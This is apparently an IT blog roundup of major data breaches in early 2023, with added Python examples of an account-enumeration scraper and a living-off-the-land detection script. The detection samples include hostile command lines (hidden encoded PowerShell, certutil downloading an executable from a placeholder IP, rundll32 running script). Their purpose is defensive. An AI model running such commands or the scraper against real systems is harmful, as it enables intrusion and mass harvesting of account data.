IT Tips & Tricks
Recent Malware Attacks: First Quarter 2023
30 May 2023
The cybersecurity landscape is ever-changing. While ransomware attacks continue, this article looks at who was hit — and how — in the first quarter of 2023, the evolving nature of cyber-attacks, and some suggestions for your cyber safety. With upward of 2,200 attacks every day, this is by no means a complete record of every malware attack or cyber-attack that occurred during this three-month period but tracks some of the most significant or surprising incidents.
March 2023
24 March: Despite the growing popularity of OpenAI’s ChatGPT, the service has not been immune to a security incident. A bug in an open-source library that ChatGPT depends on (the redis-py Redis client, according to OpenAI’s own post-mortem) caused the chatbot to show some users data belonging to other users: the titles of other people’s chat histories and, for a window of a few hours, payment-related details of some ChatGPT Plus subscribers.
Following the incident, OpenAI released the following statement: “In the hours before we took ChatGPT offline, it was possible for some users to see another active user’s first and last name, email address, payment address, the last four digits (only) of a credit card number, and credit card expiration date. Full credit card numbers were not exposed at any time.” We hope the latter was of some consolation to those whose information was exposed.
9 March: DC Health Link, the District of Columbia’s health insurance exchange, was breached. DC Health Link handles sensitive data on a number of federal legislators and their families, and the breach may have affected up to 170,000 people. US House Chief Administrative Officer Catherine L. Szpindor confirmed that Personally Identifiable Information (PII) of members of Congress, their families, and their staff had been exposed.
A threat actor, reported to be Russian, offered the House members’ data for sale on a hacking forum in exchange for cryptocurrency.
House Speaker Kevin McCarthy and Minority Leader Hakeem Jeffries confirmed that the FBI had purchased the data as part of its investigation. Having the actual dataset gave a clear picture of exactly what had been leaked and allowed for better damage control.
February 2023
21 February: Activision, maker of the Call of Duty games, suffered a data breach in which sensitive employee data and content release schedules were exfiltrated from the company’s systems. Although the breach occurred in December 2022, it was only revealed to the public much later.
An employee’s credentials were allegedly obtained in an SMS phishing attack and then used to get into the company’s systems.
15 February: Australian software company Atlassian suffered a data breach. A hacking group claimed to have extracted data on Atlassian staff, plus floor plans for offices in San Francisco and Sydney. The dataset includes names, email addresses, the departments staff work in, and other details of their employment. Atlassian said the data was taken from a third-party office-management application it uses, not from its own network or customer data.
In a statement released by the company, they claimed that the hackers had succeeded in obtaining “an Atlassian employee’s credentials that had been mistakenly posted in a public repository by the employee.”
10 February: Social media company Reddit suffered a data breach in early February after a phishing campaign aimed at its employees. Reddit CTO Christopher Slowe explained, “After successfully obtaining a single employee’s credentials, the attacker gained access to some internal docs, code, as well as some internal dashboards and business systems.”
Slowe stated that there were “no indications of breach of our primary production systems (the parts of our stack that run Reddit and store the majority of our data),” but confirmed that limited contact information for company contacts and employees (both current and former), as well as limited advertiser information were all accessed.
8 February: US-based Asian and Hispanic food delivery service Weee! had the personal information of 1.1 million customers exposed in a data breach, and some of the leaked data was posted on a hacking forum. The company said no customer financial data was exposed because Weee! “does not retain any payment information.”
6 February: Sharp HealthCare, the largest healthcare provider in San Diego, California, was forced to notify 62,777 patients that their personal information had been exposed in a malware attack on the organization’s website. Social Security numbers, health insurance data, and health records had all been compromised. Sharp, however, claims that no bank account or credit card information was stolen.
January 2023
30 January: Up to 10 million people may have had their personal information accessed by hackers after a data breach at UK-based fashion retailer, JD Sports. CFO Neil Greenhalgh advised customers “to be vigilant about potential scam emails, calls, and texts” while the company also provided “details on how to report these.”
26 January: Imagine having to inform your subscribers and employees that their sensitive personal data had been exposed in a cyberattack ten months earlier. Social Security numbers, credit card and financial account numbers, access codes, and PINs belonging to close to 2,000 people in the Vice Media network were compromised. The attack seems to have started from a compromised employee email account.
19 January: T-Mobile suffered another data breach, this time affecting about 37 million customers whose data was accessed by hackers. After its 2021 breach, in which roughly 76 million customers had their data compromised, the company agreed in a 2022 settlement to spend $150 million upgrading its data security.
The January attack raises questions about whether this has been money well spent. (For one of the gals in our copywriting department, the answer is a resounding “No.” T-Mobile’s $150 million pledge has not prevented her from having to replace — twice — her bank cards, passwords, and any other information T-Mobile had stored. “With that kind of money,” she said, “they could have given each of us around $4 million on this last breach. That would have made me feel much better about the whole thing.”)
18 January: This was a busy day in terms of cyber-attacks. First, MailChimp got hit — just six months after its previous breach. Access to its systems was gained through a social engineering attack, says MailChimp. Since this is startlingly similar to their previous breach, it has certainly cast doubts on the company’s security protocols.
On the same day, PayPal issued a letter to affected customers informing them that “unauthorized parties” had accessed PayPal customer accounts using stolen login credentials. The access was credential stuffing: passwords reused from other breaches were tried against PayPal logins, and PayPal said there was no evidence that the credentials had been stolen from its own systems. That should offer peace of mind to the more than 429 million people PayPal claims as customers.
6 January: Following what the company considered “suspicious activity linked to a number of customer accounts,” Chick-fil-A published information on what course of action customers should take if they noticed suspicious activity on their accounts, and advised customers to remove any stored payment methods on their Chick-fil-A account.
4 January: Twitter’s big leak dates back to 2022. Twitter confirmed that the data was collected through an API (Application Programming Interface) vulnerability that let anyone submit an email address or phone number, learn whether it was associated with a Twitter account, and retrieve the associated account ID. The flaw was exploited before Twitter fixed it in January 2022, and the scraped data outlived the fix: a bank of email addresses belonging to around 200 million Twitter users is still being circulated on hacking forums for as little as $2.
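The account-enumeration mechanism described above, shown as an added illustration (this is not Twitter’s code or code from the original article): an endpoint that confirms whether an identifier is registered and hands back the account ID is an oracle a scraper can loop over, while a hardened endpoint answers identically either way and rate-limits callers. The account store, identifiers and thresholds are invented for the example.

```python
import time
from collections import defaultdict
from typing import Callable, Dict, List, Optional

# Constructed sample account store; identifiers and ids are invented.
ACCOUNTS: Dict[str, str] = {
    "alice@example.com": "1001",
    "+15550100": "1002",
}


def lookup_vulnerable(identifier: str) -> dict:
    """Enumeration oracle: one call tells the caller whether the identifier
    belongs to an account and returns the account id on a match."""
    account_id = ACCOUNTS.get(identifier)
    if account_id is None:
        return {"found": False}
    return {"found": True, "id": account_id}


class RateLimiter:
    """Sliding-window counter: at most `max_calls` per client per `window` seconds."""

    def __init__(self, max_calls: int, window: float = 60.0):
        self.max_calls = max_calls
        self.window = window
        self._hits: Dict[str, List[float]] = defaultdict(list)

    def allow(self, client: str, now: Optional[float] = None) -> bool:
        now = time.monotonic() if now is None else now
        recent = [t for t in self._hits[client] if now - t < self.window]
        self._hits[client] = recent
        if len(recent) >= self.max_calls:
            return False
        recent.append(now)
        return True


def lookup_hardened(identifier: str, client: str, limiter: RateLimiter) -> dict:
    """Same response shape whether or not the identifier is registered, no account
    id in the answer, and a per-client rate limit in front of it."""
    if not limiter.allow(client):
        return {"status": "rate_limited"}
    # Perform the lookup in both cases so the response does not branch on it.
    ACCOUNTS.get(identifier)
    return {
        "status": "ok",
        "message": "If that identifier is registered, we have sent instructions to it.",
    }


def scrape(candidates: List[str], lookup: Callable[[str], dict]) -> Dict[str, str]:
    """What the scraper does: push a list of emails/phone numbers through the
    endpoint and keep every identifier the response confirms, with its id."""
    found: Dict[str, str] = {}
    for candidate in candidates:
        response = lookup(candidate)
        if response.get("found"):
            found[candidate] = response["id"]
    return found


# Constructed candidate list: two registered identifiers, two not.
CANDIDATES = ["alice@example.com", "bob@example.com", "+15550100", "+15550199"]


def demo():
    leaked = scrape(CANDIDATES, lookup_vulnerable)
    limiter = RateLimiter(max_calls=3)
    hardened = scrape(CANDIDATES, lambda c: lookup_hardened(c, "scraper", limiter))
    return leaked, hardened


if __name__ == "__main__":
    print(demo())
```

Against the vulnerable endpoint the scraper recovers both registered identifiers and their IDs; against the hardened one it learns nothing, and the fourth call from the same client is refused outright. A production endpoint also needs the same timing for both branches and a distinct, authenticated path for legitimate “find my contacts” features.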
Scorecards and Solutions
In case you weren’t keeping a tally of exactly how each of these breaches occurred, it breaks down as follows. Eight of these organizations were hacked either through their websites, their own systems, or via bugs that allowed infiltration. The remaining five had their data accessed through employee email accounts or stolen employee credentials. That means 62% of breaches originated via a website or organizational system and 38% of attacks leveraged employee email accounts or credentials.
Clearly, beefing up organizational cybersecurity should be a top priority, followed immediately by increased security of employee email accounts and ongoing education of employees.
It’s worth bearing in mind that of all detections indexed by CrowdStrike in the fourth quarter of 2021, 62% were malware-free, according to the company’s 2022 Global Threat Report. This is a growing trend among attackers.
LOTL (Living Off The Land) is a phenomenon in which “hackers accomplish their objective without writing any malware to the endpoint. Instead, they use your computer’s legitimate tools and processes in a deliberate effort to evade detection by legacy antivirus products.” For a more in-depth look at this topic, see the article, Cybersecurity Tips: Get Off the Fence About Defense.
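Because LOTL activity leaves no malicious file for a signature to match, detection has to look at how legitimate tools are used: their arguments and which process launched them. The following is an added example, not code from the original article or from any vendor product, that runs a few such rules over constructed process-creation events. The events, rule names and thresholds are invented; the patterns (Office spawning a script host, encoded PowerShell, certutil fetching a URL, rundll32 running script) are well-known LOTL indicators.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed process-creation events ("parent|image|command line"); not from any real host.
SAMPLE_EVENTS = [
    "winword.exe|powershell.exe|powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A",
    "explorer.exe|powershell.exe|powershell.exe -File C:\\scripts\\backup.ps1",
    "cmd.exe|certutil.exe|certutil.exe -urlcache -split -f http://203.0.113.5/a.txt a.exe",
    "cmd.exe|certutil.exe|certutil.exe -hashfile C:\\tools\\setup.msi SHA256",
    "svchost.exe|rundll32.exe|rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication\"",
    "services.exe|svchost.exe|svchost.exe -k netsvcs",
]


@dataclass
class Event:
    parent: str
    image: str
    cmdline: str


def parse_events(lines: List[str]) -> List[Event]:
    """Parse the constructed 'parent|image|cmdline' records; image names are
    lower-cased so the lineage check is case-insensitive."""
    events = []
    for line in lines:
        parent, image, cmdline = line.split("|", 2)
        events.append(Event(parent.strip().lower(), image.strip().lower(), cmdline.strip()))
    return events


# Lineage rule: an Office document should not be launching a script host.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line rules key on the arguments that make a legitimate binary suspicious,
# so routine admin use (certutil -hashfile, powershell -File) is not flagged.
CMDLINE_RULES: List[Tuple[str, re.Pattern]] = [
    ("encoded-powershell",
     re.compile(r"^powershell(?:\.exe)?\b.*\s-e(?:c|nc|ncodedcommand)?\s", re.I)),
    ("certutil-download",
     re.compile(r"^certutil(?:\.exe)?\b.*\s-urlcache\b", re.I)),
    ("rundll32-script",
     re.compile(r"^rundll32(?:\.exe)?\b.*javascript:", re.I)),
]


def detect(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule each event trips."""
    hits: List[Tuple[int, str]] = []
    for i, ev in enumerate(events):
        if ev.parent in OFFICE_APPS and ev.image in SCRIPT_HOSTS:
            hits.append((i, "office-spawns-shell"))
        for name, pattern in CMDLINE_RULES:
            if pattern.search(ev.cmdline):
                hits.append((i, name))
    return hits


if __name__ == "__main__":
    events = parse_events(SAMPLE_EVENTS)
    for index, rule in detect(events):
        print(f"{rule:22s} {events[index].parent} -> {events[index].cmdline}")
```

Run on the sample, the first event trips two rules (Word launching PowerShell, and an encoded command), the certutil download and the rundll32 script trip one each, and the two legitimate uses of the same binaries (a signed script run from Explorer, a file hash check) produce nothing. Rules like these are indicators rather than proof; the value is that they fire on behaviour, which a file scanner never sees.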
If you’re looking at increasing your cybersecurity, you might also glean some handy tips from this article: New Alert: 16 Smart Steps for Increased Cybersecurity.
Another excellent cybersecurity resource is the US Cybersecurity & Infrastructure Security Agency, CISA.
As far as employee email accounts are concerned, your mantra should be “multifactor authentication, multifactor authentication, multifactor authentication.” (If you get bombarded with the usual, “Oh, it’s so inconvenient!” by the users, just remind them that so is not having a job.)
If you have bosses who still downplay the need for increased cybersecurity, sharing these 2023 stats with them might motivate buy-in.
Top Cybersecurity Statistics 2023 (Thus Far!)
- Number of cyber-attacks, first quarter 2023: 200,000.
- Every 39 seconds, there is a hacker attack.
- 300,000 new malware applications — viruses, adware, Trojans, keyloggers and so forth — are created every day.
- Healthcare remains the top target of ransomware attacks.
- 92% of malware was delivered via email.
- 1 million websites have malware at any given time.
- 49 days is the average time it takes to identify a ransomware attack.
- $29M was stolen from a financial tech company by a single hacker.
- $320 million worth of cryptocurrency was stolen in hacks in the first quarter of 2023.
- 66% of CIOs say they plan to increase investment in cybersecurity.
If your bosses fall into that 66% mentioned above, remind them that the only better time to beef up security has already passed.
Our next roundup will be at the end of the second quarter of 2023. Hopefully, there’ll be less to report. Until then, stay safe, shields up, and good luck!